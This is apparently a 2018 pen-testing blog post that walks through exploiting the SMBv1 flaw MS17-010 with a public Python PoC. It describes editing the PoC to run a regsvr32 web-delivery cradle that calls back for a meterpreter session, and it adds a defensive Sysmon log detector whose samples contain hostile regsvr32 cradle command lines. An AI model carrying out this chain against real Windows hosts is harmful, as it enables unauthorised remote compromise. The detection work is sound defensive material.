MS17-010: Python

Tuesday, December 25, 2018

Introduction

MS17-010 is an exploit developed by the NSA. It is an attack against the SMBv1 protocol and was leaked in April 2017 by the Shadow Brokers. A full breakdown of MS17-010 can be found here.

SMB Vulnerabilities

With MS17-010, it's very easy to hit a box and get SYSTEM. It has made pen-testers' lives much, much easier. Searching for MS17-010 in Metasploit will display the following:

msf > search ms17

Matching Modules
================

   Name                                                   Disclosure Date  Rank     Check  Description
   ----                                                   ---------------  ----     -----  -----------
   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

There are a lot of modules here. Most of them have had their signatures hammered and will most likely be caught by any AV; and if this exploit is being used in the context of the OSCP, you aren't allowed to use these modules anyway.

To avoid using these modules, Worawit wrote a PoC in Python, which will be updated and edited throughout this post.

As of writing this, the script is able to exploit:

- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The noteworthy ones are checker.py and zzz_exploit.py. zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010, and it should allow for the exploitation of the previously mentioned Windows variants.

All credit goes to Korey McKinley and his article; small adjustments were made to suit my current setup.

Metasploit

The easiest way to do this with Metasploit is to use the exploit/multi/script/web_delivery module. This module has multiple methods for calling back to the attacker machine; however, this post will stick to regsvr32.

My Metasploit configuration looked like this:

This should produce an execution cradle that looks like this:

zzz_exploit.py

Armed with the regsvr32 execution cradle, clone Worawit’s repo. Open up zzz_exploit.py and move to Line 972 or search for the smb_pwn function.

The first few lines of this function will create a pwned.txt on the C:\ drive. This isn't required, so comment out the following:

print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)

Underneath that, there will be an example use of the service_exec function. Uncomment this and switch out the payload for the one generated by web_delivery. The function should now look similar to this:

The function has now been updated to contain the execution cradle. Run the script against the specified host with python zzz_exploit.py 192.168.0.35.

If everything went well, then it should look something like this:

regsvr32 calls back, retrieves the payload, and a meterpreter session is created.
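From the defender's side, the two things this chain leaves behind on the target are a regsvr32 process that pulls its scriptlet from a URL (the web_delivery cradle) and a service installed with a one-shot command as its binary (what service_exec-style execution via SMB looks like to the Service Control Manager). The following is an added example, not code from this post or from Worawit's repository: a small Python detector that parses constructed Sysmon process-creation (Event ID 1) and System-log service-install (Event ID 7045) records in a flattened Key=Value form of my own choosing, and flags both artefacts while leaving ordinary regsvr32 and service-installer activity alone.

```python
import re
from typing import Dict, List, Optional

# Constructed sample records (not real logs): Sysmon EventID 1 process creations
# and System-log EventID 7045 service installs, flattened to Key=Value pairs.
SAMPLE_LOGS = [
    # Benign: an installer registering a local DLL with regsvr32.
    'EventID=1 Image=C:\\Windows\\System32\\regsvr32.exe '
    'CommandLine="regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll" '
    'ParentImage=C:\\Windows\\System32\\msiexec.exe',
    # regsvr32 fetching a remote scriptlet: the shape of web_delivery's regsvr32 cradle.
    'EventID=1 Image=C:\\Windows\\System32\\regsvr32.exe '
    'CommandLine="regsvr32 /s /n /u /i:http://192.168.0.10:8080/abc.sct scrobj.dll" '
    'ParentImage=C:\\Windows\\System32\\services.exe',
    # A service whose "binary" is a cmd.exe one-liner: remote service-exec style execution.
    'EventID=7045 ServiceName=xxxxxxxx '
    'ImagePath="cmd.exe /c regsvr32 /s /n /u /i:http://192.168.0.10:8080/abc.sct scrobj.dll" '
    'ServiceType="user mode service" StartType="demand start"',
    # Benign: a normal service install pointing at a long-running executable.
    'EventID=7045 ServiceName=VendorSvc ImagePath="C:\\Program Files\\Vendor\\svc.exe" '
    'ServiceType="user mode service" StartType="auto start"',
]

# Key=Value tokens; a value is either a double-quoted string or a run of non-spaces.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')

# regsvr32's /i: argument pointing at a URL rather than a local path (ATT&CK T1218.010).
REGSVR32_URL_RE = re.compile(r'/i:\s*(https?|ftp)://', re.IGNORECASE)

# Service ImagePaths that are really commands or script hosts, not service executables.
SUSPICIOUS_IMAGEPATH_RE = re.compile(
    r'(cmd(\.exe)?\s+/[ck]\b|powershell|regsvr32|mshta|rundll32|https?://)',
    re.IGNORECASE,
)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened record into a dict of its fields."""
    fields: Dict[str, str] = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a short reason if the event matches one of the two patterns, else None."""
    event_id = event.get('EventID')
    if event_id == '1':
        image = event.get('Image', '').lower()
        command_line = event.get('CommandLine', '')
        # Local /s registration is routine; a network scriptlet in /i: is the tell.
        if image.endswith('regsvr32.exe') and REGSVR32_URL_RE.search(command_line):
            return 'regsvr32 loading a scriptlet from a URL'
    elif event_id == '7045':
        if SUSPICIOUS_IMAGEPATH_RE.search(event.get('ImagePath', '')):
            return 'service installed with a command-style ImagePath'
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over every record and collect the hits in log order."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        event = parse_event(line)
        reason = classify(event)
        if reason is not None:
            hits.append({
                'EventID': event.get('EventID', ''),
                'reason': reason,
                'detail': event.get('CommandLine') or event.get('ImagePath', ''),
            })
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOGS):
        print(f"[{hit['EventID']}] {hit['reason']}: {hit['detail']}")
```

The two benign records are there deliberately: regsvr32 registering a local DLL and a service install whose ImagePath is a real executable should not fire, so the rules key on the URL in /i: and on command-style ImagePaths rather than on the binary names alone. The same two patterns map directly onto host-based rules (Sysmon EventID 1 for the cradle, System EventID 7045 for the service) if you want to move them out of this script and into your SIEM.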

To avoid using Metasploit altogether, Shelby can be used to generate various cradles and shells.

Since writing this post, I have modified the code to allow for an easier user experience; it can be found here.

References

  1. Worawit: Twitter
  2. Worawit: GitHub
  3. Korey McKinley: Manually Exploiting MS17-010
  4. Regsvr32 Microsoft Documents
  5. Checkpoint Research: MS17-010 Analysis